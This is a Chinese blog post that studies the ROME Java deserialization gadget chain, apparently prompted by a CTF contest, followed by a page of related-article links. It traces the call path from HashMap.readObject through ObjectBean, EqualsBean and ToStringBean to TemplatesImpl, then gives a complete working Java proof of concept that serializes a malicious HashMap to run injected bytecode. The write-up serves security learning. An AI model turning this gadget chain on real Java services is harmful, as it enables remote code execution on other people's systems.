[Java反序列化]rome反序列化学习

最新推荐文章于 2024-03-12 11:04:01 发布
最新推荐文章于 2024-03-12 11:04:01 发布
阅读量1.2k 收藏 2
点赞数 3
文章标签: java 哈希算法 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rfrder/article/details/121236409
版权

前言

也算是忙里偷闲了,看了一下午的操作系统感觉自己就是傻子。。。晚上把前段时间的战疫比赛遇到的rome的反序列化链给学习了一下,之后应该还是继续课内的学习,除了打打比赛,其他的学习得等到寒假了。

分析

从网上找了利用链:

TemplatesImpl.getOutputProperties()
NativeMethodAccessorImpl.invoke0(Method, Object, Object[])
NativeMethodAccessorImpl.invoke(Object, Object[])
DelegatingMethodAccessorImpl.invoke(Object, Object[])
Method.invoke(Object, Object...)
ToStringBean.toString(String)
ToStringBean.toString()
ObjectBean.toString()
EqualsBean.beanHashCode()
ObjectBean.hashCode()

HashMap<K,V>.hash(Object)
HashMap<K,V>.readObject(ObjectInputStream)

跟着看一下吧,HashMap那里肯定就是为了调用hashCode,直接跟进ObjectBeanhashCode

    public int hashCode() {
        return _equalsBean.beanHashCode();
    }

跟进beanHashCode()

    public int beanHashCode() {
        return _obj.toString().hashCode();
    }

调用了_objtoString(),这也是继BadAttributeValueExpException之后的又一个利用toString()触发调用链的。

还需要看一下ObjectBean中的_toStringBean属性,它的类是ToStringBean,当调用ObjectBean对象的toString时,实际上是调用ToStringBean对象的toString

    public String toString() {
        Stack stack = (Stack) PREFIX_TL.get();
        String[] tsInfo = (String[]) ((stack.isEmpty()) ? null : stack.peek());
        String prefix;
        if (tsInfo==null) {
            String className = _obj.getClass().getName();
            prefix = className.substring(className.lastIndexOf(".")+1);
        }
        else {
            prefix = tsInfo[0];
            tsInfo[1] = prefix;
        }
        return toString(prefix);
    }

截取个prefix,然后继续跟进带参数的toString(prefix)

    private String toString(String prefix) {
        StringBuffer sb = new StringBuffer(128);
        try {
            PropertyDescriptor[] pds = BeanIntrospector.getPropertyDescriptors(_beanClass);
            if (pds!=null) {
                for (int i=0;i<pds.length;i++) {
                    String pName = pds[i].getName();
                    Method pReadMethod = pds[i].getReadMethod();
                    if (pReadMethod!=null &&                             // ensure it has a getter method
                        pReadMethod.getDeclaringClass()!=Object.class && // filter Object.class getter methods
                        pReadMethod.getParameterTypes().length==0) {     // filter getter methods that take parameters
                        Object value = pReadMethod.invoke(_obj,NO_PARAMS);
                        printProperty(sb,prefix+"."+pName,value);
                    }
                }
            }
        }
        catch (Exception ex) {
            sb.append("\n\nEXCEPTION: Could not complete "+_obj.getClass()+".toString(): "+ex.getMessage()+"\n");
        }
        return sb.toString();
    }

关键就是BeanIntrospector.getPropertyDescriptors(_beanClass);这行代码,它获取类的属性的getter和setter,稍微跟进去看看一些处理就知道了:

    private static PropertyDescriptor[] getPDs(Class klass) throws IntrospectionException {
        Method[] methods = klass.getMethods();
        Map getters = getPDs(methods,false);
        Map setters = getPDs(methods,true);
        List pds     = merge(getters,setters);
        PropertyDescriptor[] array = new PropertyDescriptor[pds.size()];
        pds.toArray(array);
        return array;
    }

之后下面的调用都懂了:

                    Method pReadMethod = pds[i].getReadMethod();
                    if (pReadMethod!=null &&                             // ensure it has a getter method
                        pReadMethod.getDeclaringClass()!=Object.class && // filter Object.class getter methods
                        pReadMethod.getParameterTypes().length==0) {     // filter getter methods that take parameters
                        Object value = pReadMethod.invoke(_obj,NO_PARAMS);

获取对应的Method,如果它是无参的就调用了。

所以rome链的后面这部分利用其实就类似于CommonsBeanutils的链了,调用TemplatesImplgetOutputProperties进行动态加载字节码来实现命令执行。

所以直接尝试构造POC就可以了,比较简单:

package com.summer.rome;

import com.summer.util.SerializeUtil;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import com.sun.syndication.feed.impl.ObjectBean;
import com.sun.syndication.feed.impl.ToStringBean;
import javax.xml.transform.Templates;
import java.lang.reflect.Field;
import java.util.HashMap;

public class RomeUn {
    public static void main(String[] args) throws Exception{
        byte[] evilCode = SerializeUtil.getEvilCode();
        TemplatesImpl templates = new TemplatesImpl();
        SerializeUtil.setFieldValue(templates,"_bytecodes",new byte[][]{evilCode});
        SerializeUtil.setFieldValue(templates,"_name","feng");
        SerializeUtil.setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());

        ToStringBean toStringBean = new ToStringBean(Templates.class, templates);
        EqualsBean equalsBean = new EqualsBean(ToStringBean.class, toStringBean);

        ObjectBean objectBean = new ObjectBean(String.class,"feng");


        HashMap evilMap = new HashMap();
        evilMap.put(objectBean,1);
        evilMap.put(objectBean,1);
        
        SerializeUtil.setFieldValue(objectBean,"_equalsBean",equalsBean);


        byte[] bytes = SerializeUtil.serialize(evilMap);
        SerializeUtil.unserialize(bytes);
    }
}


package com.summer.util;

import javassist.ClassPool;
import javassist.CtClass;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;

public class SerializeUtil {
    public static Object getFieldValue(Object obj, String fieldName) throws Exception{
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        return field.get(obj);
    }
    public static byte[] getEvilCode() throws Exception{
        ClassPool pool = ClassPool.getDefault();
        CtClass clazzz = pool.get("EvilTest");
        byte[] code = clazzz.toBytecode();
        return code;
    }

    public static void unserialize(byte[] bytes) throws Exception{
        try(ByteArrayInputStream bain = new ByteArrayInputStream(bytes);
            ObjectInputStream oin = new ObjectInputStream(bain)){
            oin.readObject();
        }
    }

    public static byte[] serialize(Object o) throws Exception{
        try(ByteArrayOutputStream baout = new ByteArrayOutputStream();
            ObjectOutputStream oout = new ObjectOutputStream(baout)){
            oout.writeObject(o);
            return baout.toByteArray();
        }
    }
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj,value);
    }
}

网上的链子似乎有个多余的点,它调用_objtoString调用的是ObjectBeantoString来触发,没有这个必要,直接触发ToStringBeantoString即可。

同样的,为了防止put的时候触发反序列化,先放进去无害的,put完之后再利用反射来修改_equalsBean为恶意的。

在这里插入图片描述

总结

好久没看Java的反序列化了,一开始看起来去回忆之前的内容也花了一些时间,稍微把动态加载字节码还有CommonsBeanutils给回忆起来就会发现这条链子非常简单了。

bfengj
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
rome:收集优秀文章,编写最佳实践,打造自己的Java知识库
05-28
rome Rome was not built in one day 罗马非一日建成 取名来由 命名rome,源于"Rome was not built in one day",旨在表达如果想提升自己的技能和知识面,并不是一时半会的功夫就能达成,需要日积月累的学习、总结和记录。 项目宗旨 该项目主要包括两部分:参考文章和最佳实践 参考文章 收集日常开发中相关问题的解决方案,在各个子module下的README.md文件中都有相应的文章地址和解决方法,方便查找和翻阅。 最佳实践(持续更新中) 通过module的层级关系编排,目前相应的知识点如下 springboot springboot-demo springboot项目的搭建和运行 springboot项目内置LogBack日志系统的使用 点击 springboot项目如何使用Log4j2 点击 springboot项目集成rabbitm
[Java序列]—Rome序列
Sentiment的博客
04-28 435
ROME可能是目前最完善的开源聚合工具,ROME支持绝大多数的RSS协议。
【Web】浅聊Hessian序列之打Rome出网&不出网
最新发布
uuzeray的博客
03-12 894
正如我们前文所说,当Hessian序列Map类型的对象的时候,会自动调用其put方法,而put方法又会牵引出各种相关利用链打法。map.put对于HashMap会触发key.hashCode()。利用到hashCode的链子有很多,如CC6和Rome相关链,但很遗憾的是CC6因为一些原因无法使用,后面会出一篇文章专门讲其原因。本文主要讲一下Rome出网和不出网的两种利用方式。
Rome序列
01-22 698
Rome序列 Gadget /* * Gadget: * HashMap#readObject * ObjectBean#hashCode * EqualsBean#beanHashCode * ToStringBean#toString * TemplatesImpl#getOutputProperties * */ HashMap#readObject 可以调用到任意一个类的 hashCode 方法,这里调用到的是 Obje
【Web】浅聊Java序列Rome——关于其他利用链
uuzeray的博客
03-09 1028
Rome中ToStringBean的利用和jdk7u21原生序列真的很神似,下面不少链子应该也能拿jdk7u21原生来改,感兴趣的师傅可以尝试一下。【Web】Java原生序列之jdk7u21——又见动态代理-CSDN博客。
ROME序列分析
qq_53263789的博客
03-29 619
title: ROME序列 categories: java序列 Rome Rome 就是为 RSS聚合开发的框架, 可以提供RSS阅读和发布器。 Rome 提供了 ToStringBean 这个类,提供深入的 toString 方法对JavaBean进行操作 Calc package bytecode; import com.sun.org.apache.xalan.internal.xsltc.DOM; import com.sun.org.apache.xalan.internal.xs.
Javaweb安全——序列漏洞-Rome
weixin_43610673的博客
01-30 324
核心是 ToStringBean#toString()会调用其封装类的所有无参 getter方法
java rome_Rome使用入门
weixin_39889544的博客
02-16 469
Rome的两种使用方法所需jar包的下载 here,在这里可以找到与rome相关的所有文件1、只使用romepackage com.ivo.rss;import java.io.IOException;import java.net.URL;import java.util.Iterator;import com.sun.syndication.feed.synd.SyndEntry;import...
java rome_java使用Rome解析Rss的实例
weixin_32568295的博客
02-16 449
Rome简介Rome是为RSS聚合而开发的开源包,它可以支持0.91、0.92、0.93、0.94、1.0、2.0,可以说rss的版本基本上都支持了。Rss简介RSS是站点用来和其他站点之间共享内容的一种简易方式(也叫聚合内容),通常被用于新闻和其他按顺序排列的网站,例如Blog。RSS就是一种用来分发和汇集网页内容的XML格式!RSS =Really Simple Syndication(真正简...
Rome链分析
Sk1y的博客
07-01 581
Rome链分析 ysoserial BadAttributeValueExpException 简
Java Rome
05-14
Rome是为RSS聚合而开发的一个框架,让你可以快速的开发基于java的RSS阅读,发布器,支持 RSS 0.91 Netscape RSS 0.91 Userland RSS 0.92 RSS 0.93 RSS 0.94 RSS 1.0 RSS 2.0 Atom 0.3 Atom 1.0 等标准。
rome-1.5.0.jar
08-10
Rome是为RSS聚合而开发的一个框架,让你可以快速的开发基于java的RSS阅读
java中rss解析器(rome.jar和jdom.jar)示例
09-04
主要介绍了java中rss解析器(rome.jar和jdom.jar)示例,需要的朋友可以参考下
rome:用于RSS和Atom提要的Java
05-06
罗马 罗马是用于RSS和Atom提要的Java框架。 该框架包含几个模块: :warning: 由于缺乏积极的维护者,该项目的维护和开发目前受到限制。 考虑成为一个积极的维护者。 项目结构 模块 描述 rome 用于生成和解析RSS和Atom提要的库。 rome-modules MediaRSS,GeoRSS等扩展的生成器和解析器。 rome-opml 解析器和工具。 rome-fetcher 已弃用(有关详细信息,请参见 ) 其他不推荐使用的模块: rome-certiorem , rome-certiorem-webapp和rome-propono 。 例子 解析供稿: String url = " https://stackoverflow.com/feeds/tag?tagnames=rome " ; SyndFeed feed = new SyndFeedInput (
rome,用于rss和atom提要的java库.zip
10-11
Rome是一个用于RSS和Atom提要的Java框架。框架由几个模块组成:
java 序列利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
-a:生成exploit下的所有payload(例如:hessian下的SpringPartiallyComparableAdvisorHolder, SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin) -t:对生成的payloads进行解码测试 -v:verbose mode...
java编译软件
09-13
java编译软件,我记得好像不支持JDK1.6以上编译
java使用Rome解析Rss的实例
06-23
java使用Rome解析Rss的实例
python绘图time new rome字体
07-25
您可以使用Python中的Matplotlib库来绘制图形,并设置Time New Rome字体。下面是一个示例代码: ```python import matplotlib.pyplot as plt from matplotlib import font_manager # 设置Time New Rome字体路径 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值